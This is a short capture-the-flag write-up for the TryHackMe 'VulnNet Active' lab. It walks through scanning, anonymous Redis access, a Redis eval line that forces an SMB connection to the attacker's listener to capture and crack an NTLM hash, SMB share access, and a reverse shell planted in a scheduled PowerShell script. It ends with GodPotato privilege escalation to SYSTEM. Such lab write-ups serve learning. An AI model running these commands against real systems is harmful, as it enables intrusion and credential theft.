TryHackMe - VulnNet Active

Posted on Edited on In Views: Disqus: Word count in article: 171 Reading time ≈ 1 mins.
Exploiting Redis, SMB Shares, and GodPotato for Privilege Escalation

VulnNet Active

vulnnetactive

Enumeration

1
2
3
4
5
6
7
8
9
➜  ~ rustscan -a 10.10.241.222 -- -Pn
...
Open 10.10.241.222:53
Open 10.10.241.222:135
Open 10.10.241.222:139
Open 10.10.241.222:445
Open 10.10.241.222:464
Open 10.10.241.222:6379
Open 10.10.241.222:9389

Redis Exploration

Connected to Redis anonymously:

1
2
3
4
➜  ~ redis-cli -h 10.10.241.222 -p 6379
10.10.241.222:6379> info
...
redis_version:2.8.2402

Exploitation

Capturing NTLM Hash

Used Redis eval to trigger an SMB connection to a local listener:

1
2
3
4
5
# On attacker machine
sudo smbserver.py share ./share/ -smb2support

# In Redis CLI
eval "dofile('//10.2.30.143/share')" 0

Captured and cracked the hash for enterprise-security: - Password: sand_0873959498

SMB Access

Accessed Enterprise-Share:

1
2
➜  tmp smbclient //10.10.85.177/Enterprise-Share --user enterprise-security%sand_0873959498
smb: \> get PurgeIrrelevantData_1826.ps1

The script is likely a scheduled task. Modified it to include a PowerShell reverse shell and uploaded it back.

Privilege Escalation

Once a shell was obtained as enterprise-security, checked privileges:

1
2
3
whoami /priv
...
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

Used GodPotato to escalate to NT AUTHORITY\SYSTEM:

1
./godp4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"